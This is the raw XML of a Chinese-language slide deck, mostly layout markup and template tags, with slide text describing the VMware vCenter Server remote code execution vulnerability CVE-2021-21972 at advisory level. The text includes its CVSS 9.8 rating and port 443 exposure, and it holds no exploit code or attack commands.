              <a:gd name="connsiteX20" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY20" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX21" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY21" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX22" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY22" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX23" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY23" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX24" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY24" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX25" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY25" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX26" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY26" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX27" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY27" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX28" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY28" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX29" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY29" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX30" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY30" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX31" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY31" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX32" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY32" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX33" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY33" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX34" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY34" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX35" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY35" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX36" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY36" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX37" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY37" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX38" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY38" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX39" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY39" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX40" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY40" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX41" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY41" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX42" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY42" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX43" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY43" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX44" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY44" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX45" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY45" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX46" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY46" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX47" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY47" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX48" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY48" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX49" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY49" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX50" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY50" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX51" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY51" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX52" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY52" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX53" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY53" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX54" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY54" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX55" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY55" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX56" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY56" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX57" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY57" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX58" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY58" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX59" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY59" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX60" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY60" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX61" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY61" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX62" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY62" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX63" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY63" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX64" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY64" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX65" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY65" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX66" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY66" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX67" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY67" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX68" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY68" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX69" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY69" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX70" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY70" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX71" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY71" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX72" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY72" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX73" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY73" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX74" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY74" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX75" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY75" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX76" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY76" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX77" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY77" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX78" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY78" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX79" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY79" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX80" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY80" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX81" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY81" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX82" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY82" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX83" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY83" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX84" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY84" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX85" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY85" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX86" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY86" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX87" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY87" fmla="*/ 121763 h 60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19074" h="607902">
                <a:moveTo>
                  <a:pt x="220247" y="135608"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="245549" y="135608"/>
                  <a:pt x="265974" y="156052"/>
                  <a:pt x="265974" y="181264"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="265974" y="206527"/>
                  <a:pt x="245499" y="226920"/>
                  <a:pt x="220247" y="226920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194996" y="226920"/>
                  <a:pt x="174521" y="206426"/>
                  <a:pt x="174521" y="181264"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174521" y="156052"/>
                  <a:pt x="194996" y="135608"/>
                  <a:pt x="220247" y="135608"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="212236" y="59615"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="207866" y="59615"/>
                  <a:pt x="203954" y="62253"/>
                  <a:pt x="202277" y="66210"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="191760" y="91321"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190592" y="94010"/>
                  <a:pt x="188458" y="96140"/>
                  <a:pt x="185714" y="97206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="185511" y="97257"/>
                  <a:pt x="185257" y="97409"/>
                  <a:pt x="185054" y="97459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182412" y="98474"/>
                  <a:pt x="179516" y="98474"/>
                  <a:pt x="176924" y="97459"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="151521" y="87263"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="147507" y="85639"/>
                  <a:pt x="142934" y="86603"/>
                  <a:pt x="139886" y="89647"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="128403" y="101061"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125304" y="104105"/>
                  <a:pt x="124440" y="108772"/>
                  <a:pt x="126066" y="112780"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="136329" y="137739"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137447" y="140377"/>
                  <a:pt x="137447" y="143268"/>
                  <a:pt x="136329" y="145906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136278" y="146261"/>
                  <a:pt x="136126" y="146515"/>
                  <a:pt x="136024" y="146870"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134907" y="149508"/>
                  <a:pt x="132823" y="151639"/>
                  <a:pt x="130181" y="152806"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="105133" y="163510"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="101119" y="165184"/>
                  <a:pt x="98528" y="169039"/>
                  <a:pt x="98528" y="173351"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="98528" y="173402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98630" y="173402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98630" y="189534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="98630" y="193897"/>
                  <a:pt x="101272" y="197803"/>
                  <a:pt x="105235" y="199477"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130181" y="209826"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="132874" y="210942"/>
                  <a:pt x="135008" y="213073"/>
                  <a:pt x="136075" y="215812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136228" y="216116"/>
                  <a:pt x="136329" y="216421"/>
                  <a:pt x="136482" y="216725"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137549" y="219363"/>
                  <a:pt x="137650" y="222305"/>
                  <a:pt x="136532" y="224943"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="126371" y="250156"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="124745" y="254164"/>
                  <a:pt x="125710" y="258729"/>
                  <a:pt x="128759" y="261773"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="140191" y="273238"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="143239" y="276332"/>
                  <a:pt x="147913" y="277195"/>
                  <a:pt x="151927" y="275572"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="177077" y="265223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="179617" y="264208"/>
                  <a:pt x="182564" y="264208"/>
                  <a:pt x="185206" y="265223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="185409" y="265273"/>
                  <a:pt x="185663" y="265426"/>
                  <a:pt x="185867" y="265476"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188559" y="266491"/>
                  <a:pt x="190795" y="268622"/>
                  <a:pt x="191964" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="202735" y="296472"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="204411" y="300480"/>
                  <a:pt x="208273" y="303016"/>
                  <a:pt x="212642" y="303016"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="228799" y="303016"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="233169" y="303016"/>
                  <a:pt x="237081" y="300378"/>
                  <a:pt x="238757" y="296421"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="249224" y="271057"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="250342" y="268419"/>
                  <a:pt x="252475" y="266288"/>
                  <a:pt x="255117" y="265223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255219" y="265172"/>
                  <a:pt x="255422" y="265070"/>
                  <a:pt x="255575" y="265020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="258217" y="263954"/>
                  <a:pt x="261113" y="263954"/>
                  <a:pt x="263704" y="264969"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="289463" y="275216"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="293426" y="276840"/>
                  <a:pt x="298050" y="275927"/>
                  <a:pt x="301098" y="272883"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="312530" y="261418"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="315680" y="258374"/>
                  <a:pt x="316595" y="253707"/>
                  <a:pt x="314918" y="249750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="304350" y="224284"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="303283" y="221747"/>
                  <a:pt x="303283" y="218805"/>
                  <a:pt x="304299" y="216268"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="304401" y="215913"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="305519" y="213225"/>
                  <a:pt x="307602" y="211094"/>
                  <a:pt x="310244" y="209978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="335851" y="199071"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339865" y="197397"/>
                  <a:pt x="342405" y="193542"/>
                  <a:pt x="342405" y="189179"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="342405" y="173047"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="342405" y="168684"/>
                  <a:pt x="339763" y="164778"/>
                  <a:pt x="335800" y="163104"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="310295" y="152450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="307602" y="151334"/>
                  <a:pt x="305519" y="149153"/>
                  <a:pt x="304401" y="146464"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="304401" y="146363"/>
                  <a:pt x="304350" y="146312"/>
                  <a:pt x="304350" y="146261"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="303232" y="143674"/>
                  <a:pt x="303232" y="140783"/>
                  <a:pt x="304248" y="138145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="314562" y="112425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="316188" y="108417"/>
                  <a:pt x="315223" y="103851"/>
                  <a:pt x="312174" y="100808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="300743" y="89343"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="297694" y="86248"/>
                  <a:pt x="293020" y="85386"/>
                  <a:pt x="289006" y="87009"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="263704" y="97409"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="261062" y="98575"/>
                  <a:pt x="258064" y="98474"/>
                  <a:pt x="255422" y="97409"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255270" y="97409"/>
                  <a:pt x="255168" y="97358"/>
                  <a:pt x="255016" y="97257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252374" y="96191"/>
                  <a:pt x="250291" y="94162"/>
                  <a:pt x="249122" y="91524"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="238300" y="66159"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="236623" y="62152"/>
                  <a:pt x="232711" y="59615"/>
                  <a:pt x="228393" y="59615"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="227935" y="8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="355767" y="-1007"/>
                  <a:pt x="459669" y="102076"/>
                  <a:pt x="459669" y="229458"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="459669" y="249598"/>
                  <a:pt x="464597" y="269484"/>
                  <a:pt x="474099" y="287341"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="516625" y="367443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="523890" y="381039"/>
                  <a:pt x="514135" y="397526"/>
                  <a:pt x="498689" y="397779"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="459720" y="398540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459720" y="483107"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="459720" y="509689"/>
                  <a:pt x="438025" y="531402"/>
                  <a:pt x="411402" y="531402"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="344844" y="531402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344844" y="590958"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="344844" y="600293"/>
                  <a:pt x="337273" y="607902"/>
                  <a:pt x="327925" y="607902"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89688" y="607902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80339" y="607902"/>
                  <a:pt x="72718" y="600293"/>
                  <a:pt x="72718" y="590958"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72718" y="529829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72718" y="461648"/>
                  <a:pt x="56358" y="394482"/>
                  <a:pt x="25111" y="333657"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9462" y="303118"/>
                  <a:pt x="419" y="268469"/>
                  <a:pt x="12" y="231792"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1258" y="104562"/>
                  <a:pt x="100510" y="1022"/>
                  <a:pt x="227935" y="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2602052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2602052" y="202518"/>
              <a:ext cx="6983806" cy="8039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796386" y="417310"/>
              <a:ext cx="7088135" cy="27699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</a:rPr>
                <a:t>VMWare vCenter Server </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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远程代码执行漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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1800" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/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CVE-2021-21972)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="18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407377" y="1356543"/>
            <a:ext cx="2295205" cy="27699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漏洞信息收集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93468" y="1742452"/>
            <a:ext cx="10580038" cy="21544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从官方网站收集该漏洞的详情、类别、等级、影响范围等信息。研究漏洞的攻击原理和可能的影响，了解漏洞的具体特点和潜在危害。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507" y="2099877"/>
            <a:ext cx="4956917" cy="291428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425" y="2047827"/>
            <a:ext cx="6186082" cy="2966332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393468" y="5178806"/>
            <a:ext cx="10252757" cy="1261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vSphere Client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（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HTML5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）在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vCenter Server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插件中包含远程代码执行漏洞。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VMware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已将此问题的严重性评估为严重级别，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CVSSv3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的最高基本得分为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9.8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。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具有端口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443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网络访问权限的恶意行为者可能会利用此问题在承载</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-C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vCenter Server</a:t>
            </a:r>
            <a:r>
              <a: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华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>的底层操作系统上以不受限制的权限执行命令。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-C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265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/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3375_1*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20233375"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag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375_1*f*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20233375"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX_BRIGHTNESS" val="0.35"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="-2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:243.58094787597662,&quot;left&quot;:580.4,&quot;top&quot;:159.89999850295658,&quot;width&quot;:331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根据需要可酌情增减文字，以便观者准确地理解您传达的思想&#10;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3375_1*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20233375"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag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375_1*f*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20233375"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX_BRIGHTNESS" val="0.35"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="-2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:243.58094787597662,&quot;left&quot;:580.4,&quot;top&quot;:159.89999850295658,&quot;width&quot;:331.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根据需要可酌情增减文字，以便观者准确地理解您传达的思想&#10;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3375_1*i*3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20233375"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/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DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/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UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:6164,&quot;width&quot;:9244}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DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/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PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:6870,&quot;width&quot;:17235}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DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:265.9126771653543,&quot;left&quot;:76.95858267716535,&quot;top&quot;:77.59338582677165,&quot;width&quot;:756.7040157480315}"/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commondata" val="eyJoZGlkIjoiMTY3NTYyNzExOTIwMzU1ZDg0ZDBjYzUxMzJjZTVjZjAifQ=="/>
